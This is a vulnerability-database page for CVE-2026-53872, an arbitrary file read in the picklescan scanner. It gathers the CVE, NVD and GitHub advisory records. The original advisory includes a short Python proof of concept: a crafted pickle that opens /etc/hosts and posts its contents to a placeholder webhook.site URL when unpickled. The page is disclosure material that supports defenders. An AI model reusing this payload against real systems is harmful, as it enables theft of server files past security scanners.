CVE-2026-53872 (GCVE-0-2026-53872)
Vulnerability from cvelistv5 – Published: 2026-06-17 15:05 – Updated: 2026-06-17 17:36
VLAI
Title
picklescan - Arbitrary File Read via Unsafe Pickle Deserialization
Summary
picklescan before 0.0.35 contains an unsafe pickle deserialization vulnerability allowing unauthenticated attackers to read arbitrary server files by chaining io.FileIO and urllib.request.urlopen. Attackers can bypass RCE-focused blocklists to exfiltrate sensitive data like /etc/passwd to external servers.
Severity
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/mmaitre314/picklescan/security… | vendor-advisory |
| https://www.vulncheck.com/advisories/picklescan-a… | third-party-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| picklescan | picklescan |
Affected:
0 , < 0.0.35
(semver)
Unaffected: 0.0.35 (semver) |
Date Public
2026-01-07 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-53872",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-17T17:34:46.216036Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-17T17:36:17.833Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9726-w42j-3qjr"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"packageURL": "pkg:pypi/picklescan",
"product": "picklescan",
"vendor": "picklescan",
"versions": [
{
"lessThan": "0.0.35",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"status": "unaffected",
"version": "0.0.35",
"versionType": "semver"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:mmaitre314:picklescan:*:*:*:*:*:*:*:*",
"versionEndExcluding": "0.0.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "shivasurya"
}
],
"datePublic": "2026-01-07T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "picklescan before 0.0.35 contains an unsafe pickle deserialization vulnerability allowing unauthenticated attackers to read arbitrary server files by chaining io.FileIO and urllib.request.urlopen. Attackers can bypass RCE-focused blocklists to exfiltrate sensitive data like /etc/passwd to external servers."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS"
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-17T15:05:02.203Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "GHSA Advisory GHSA-9726-w42j-3qjr",
"tags": [
"vendor-advisory"
],
"url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9726-w42j-3qjr"
},
{
"name": "VulnCheck Advisory: picklescan - Arbitrary File Read via Unsafe Pickle Deserialization",
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/picklescan-arbitrary-file-read-via-unsafe-pickle-deserialization"
}
],
"title": "picklescan - Arbitrary File Read via Unsafe Pickle Deserialization",
"x_generator": {
"engine": "vulncheck-endgame"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2026-53872",
"datePublished": "2026-06-17T15:05:02.203Z",
"dateReserved": "2026-06-10T21:23:54.283Z",
"dateUpdated": "2026-06-17T17:36:17.833Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2026-53872",
"date": "2026-06-18",
"epss": "0.00509",
"percentile": "0.39303"
},
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-53872\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-06-17T17:34:46.216036Z\"}}}], \"references\": [{\"url\": \"https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9726-w42j-3qjr\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-06-17T17:34:29.859Z\"}}], \"cna\": {\"title\": \"picklescan - Arbitrary File Read via Unsafe Pickle Deserialization\", \"credits\": [{\"lang\": \"en\", \"type\": \"reporter\", \"value\": \"shivasurya\"}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV4_0\": {\"Safety\": \"NOT_DEFINED\", \"version\": \"4.0\", \"Recovery\": \"NOT_DEFINED\", \"baseScore\": 8.7, \"Automatable\": \"NOT_DEFINED\", \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"valueDensity\": \"NOT_DEFINED\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N\", \"exploitMaturity\": \"NOT_DEFINED\", \"providerUrgency\": \"NOT_DEFINED\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"NONE\", \"subIntegrityImpact\": \"NONE\", \"vulnIntegrityImpact\": \"NONE\", \"subAvailabilityImpact\": \"NONE\", \"vulnAvailabilityImpact\": \"NONE\", \"subConfidentialityImpact\": \"NONE\", \"vulnConfidentialityImpact\": \"HIGH\", \"vulnerabilityResponseEffort\": \"NOT_DEFINED\"}}, {\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.5, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"picklescan\", \"product\": \"picklescan\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"0.0.35\", \"versionType\": \"semver\"}, {\"status\": \"unaffected\", \"version\": \"0.0.35\", \"versionType\": \"semver\"}], \"packageURL\": \"pkg:pypi/picklescan\", \"defaultStatus\": \"unaffected\"}], \"datePublic\": \"2026-01-07T00:00:00.000Z\", \"references\": [{\"url\": \"https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9726-w42j-3qjr\", \"name\": \"GHSA Advisory GHSA-9726-w42j-3qjr\", \"tags\": [\"vendor-advisory\"]}, {\"url\": \"https://www.vulncheck.com/advisories/picklescan-arbitrary-file-read-via-unsafe-pickle-deserialization\", \"name\": \"VulnCheck Advisory: picklescan - Arbitrary File Read via Unsafe Pickle Deserialization\", \"tags\": [\"third-party-advisory\"]}], \"x_generator\": {\"engine\": \"vulncheck-endgame\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"picklescan before 0.0.35 contains an unsafe pickle deserialization vulnerability allowing unauthenticated attackers to read arbitrary server files by chaining io.FileIO and urllib.request.urlopen. Attackers can bypass RCE-focused blocklists to exfiltrate sensitive data like /etc/passwd to external servers.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-22\", \"description\": \"Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)\"}]}], \"cpeApplicability\": [{\"nodes\": [{\"negate\": false, \"cpeMatch\": [{\"criteria\": \"cpe:2.3:a:mmaitre314:picklescan:*:*:*:*:*:*:*:*\", \"vulnerable\": true, \"versionEndExcluding\": \"0.0.35\"}], \"operator\": \"OR\"}]}], \"providerMetadata\": {\"orgId\": \"83251b91-4cc7-4094-a5c7-464a1b83ea10\", \"shortName\": \"VulnCheck\", \"dateUpdated\": \"2026-06-17T15:05:02.203Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2026-53872\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-06-17T17:36:17.833Z\", \"dateReserved\": \"2026-06-10T21:23:54.283Z\", \"assignerOrgId\": \"83251b91-4cc7-4094-a5c7-464a1b83ea10\", \"datePublished\": \"2026-06-17T15:05:02.203Z\", \"assignerShortName\": \"VulnCheck\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
}
}
FKIE_CVE-2026-53872
Vulnerability from fkie_nvd - Published: 2026-06-17 17:17 - Updated: 2026-06-17 20:21
Severity
Summary
picklescan before 0.0.35 contains an unsafe pickle deserialization vulnerability allowing unauthenticated attackers to read arbitrary server files by chaining io.FileIO and urllib.request.urlopen. Attackers can bypass RCE-focused blocklists to exfiltrate sensitive data like /etc/passwd to external servers.
References
Impacted products
| Vendor | Product | Version |
|---|
{
"affected": [
{
"affectedData": [
{
"defaultStatus": "unaffected",
"packageURL": "pkg:pypi/picklescan",
"product": "picklescan",
"vendor": "picklescan",
"versions": [
{
"lessThan": "0.0.35",
"status": "affected",
"version": "0",
"versionType": "semver"
},
{
"status": "unaffected",
"version": "0.0.35",
"versionType": "semver"
}
]
}
],
"source": "disclosure@vulncheck.com"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "picklescan before 0.0.35 contains an unsafe pickle deserialization vulnerability allowing unauthenticated attackers to read arbitrary server files by chaining io.FileIO and urllib.request.urlopen. Attackers can bypass RCE-focused blocklists to exfiltrate sensitive data like /etc/passwd to external servers."
}
],
"id": "CVE-2026-53872",
"lastModified": "2026-06-17T20:21:59.863",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "disclosure@vulncheck.com",
"type": "Secondary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "disclosure@vulncheck.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2026-53872",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "yes"
},
{
"technicalImpact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-17T17:34:46.216036Z",
"version": "2.0.3"
}
}
]
},
"published": "2026-06-17T17:17:25.473",
"references": [
{
"source": "disclosure@vulncheck.com",
"url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9726-w42j-3qjr"
},
{
"source": "disclosure@vulncheck.com",
"url": "https://www.vulncheck.com/advisories/picklescan-arbitrary-file-read-via-unsafe-pickle-deserialization"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9726-w42j-3qjr"
}
],
"sourceIdentifier": "disclosure@vulncheck.com",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-22"
}
],
"source": "disclosure@vulncheck.com",
"type": "Secondary"
}
]
}
GHSA-5V23-73V4-W2FP
Vulnerability from github – Published: 2026-06-17 18:35 – Updated: 2026-06-18 14:46
VLAI
Summary
Duplicate Advisory: picklescan has Arbitrary file read using `io.FileIO`
Details
Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-9726-w42j-3qjr. This link is maintained to preserve external references.
Original Description
picklescan before 0.0.35 contains an unsafe pickle deserialization vulnerability allowing unauthenticated attackers to read arbitrary server files by chaining io.FileIO and urllib.request.urlopen. Attackers can bypass RCE-focused blocklists to exfiltrate sensitive data like /etc/passwd to external servers.
Severity
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "picklescan"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.35"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-06-18T14:46:10Z",
"nvd_published_at": "2026-06-17T17:17:25Z",
"severity": "HIGH"
},
"details": "### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-9726-w42j-3qjr. This link is maintained to preserve external references.\n\n### Original Description\npicklescan before 0.0.35 contains an unsafe pickle deserialization vulnerability allowing unauthenticated attackers to read arbitrary server files by chaining io.FileIO and urllib.request.urlopen. Attackers can bypass RCE-focused blocklists to exfiltrate sensitive data like /etc/passwd to external servers.",
"id": "GHSA-5v23-73v4-w2fp",
"modified": "2026-06-18T14:46:10Z",
"published": "2026-06-17T18:35:57Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9726-w42j-3qjr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53872"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/picklescan-arbitrary-file-read-via-unsafe-pickle-deserialization"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
],
"summary": "Duplicate Advisory: picklescan has Arbitrary file read using `io.FileIO` ",
"withdrawn": "2026-06-18T14:46:10Z"
}
GHSA-9726-W42J-3QJR
Vulnerability from github – Published: 2026-01-08 17:25 – Updated: 2026-06-18 14:46
VLAI
Summary
picklescan has Arbitrary file read using `io.FileIO`
Details
Summary
Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.
Details
The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:
-
io.FileIO: Opens local files without using builtins.open.
-
urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.
-
Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.
PoC
import pickle, io, urllib.request
class GetFile:
def __reduce__(self):
return (io.FileIO, ('/etc/hosts', 'r'))
class Exfiltrate:
def __reduce__(self):
return (urllib.request.urlopen, ('https://webhook.site/YOUR_UUID_HERE', GetFile()))
with open("bypass_http.pkl", "wb") as f:
pickle.dump(Exfiltrate(), f)
Impact
- Arbitrary file read
Thanks for this library and your time. If you think picklescan is focused on detecting only RCE kind of vulnerabilities rather adding File IO, Http or any protocol based may cause lot of noise, feel free to close this issue.
Severity
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "picklescan"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.35"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-53872"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-918"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-08T17:25:35Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\nUnsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.\n\n### Details\nThe application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:\n\n1. io.FileIO: Opens local files without using builtins.open.\n\n2. urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.\n\n3. Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.\n\n### PoC\n\n```python\nimport pickle, io, urllib.request\n\nclass GetFile:\n def __reduce__(self):\n return (io.FileIO, (\u0027/etc/hosts\u0027, \u0027r\u0027))\n\nclass Exfiltrate:\n def __reduce__(self):\n return (urllib.request.urlopen, (\u0027https://webhook.site/YOUR_UUID_HERE\u0027, GetFile()))\n\nwith open(\"bypass_http.pkl\", \"wb\") as f:\n pickle.dump(Exfiltrate(), f)\n```\n\n\u003cimg width=\"650\" height=\"114\" alt=\"Screenshot 2025-12-30 at 10 13 14\u202fPM\" src=\"https://github.com/user-attachments/assets/4edf9640-80f6-4701-ae87-cff1079e2994\" /\u003e\n\n\n### Impact\n\n- Arbitrary file read\n\nThanks for this library and your time. If you think `picklescan` is focused on detecting only `RCE` kind of vulnerabilities rather adding `File IO`, `Http` or any protocol based may cause lot of noise, feel free to close this issue.",
"id": "GHSA-9726-w42j-3qjr",
"modified": "2026-06-18T14:46:26Z",
"published": "2026-01-08T17:25:35Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9726-w42j-3qjr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53872"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/pull/55"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/commit/a01c58d5dd7960db557b849817c0ab83ab111ef1"
},
{
"type": "PACKAGE",
"url": "https://github.com/mmaitre314/picklescan"
},
{
"type": "WEB",
"url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.35"
},
{
"type": "WEB",
"url": "https://www.vulncheck.com/advisories/picklescan-arbitrary-file-read-via-unsafe-pickle-deserialization"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "picklescan has Arbitrary file read using `io.FileIO` "
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…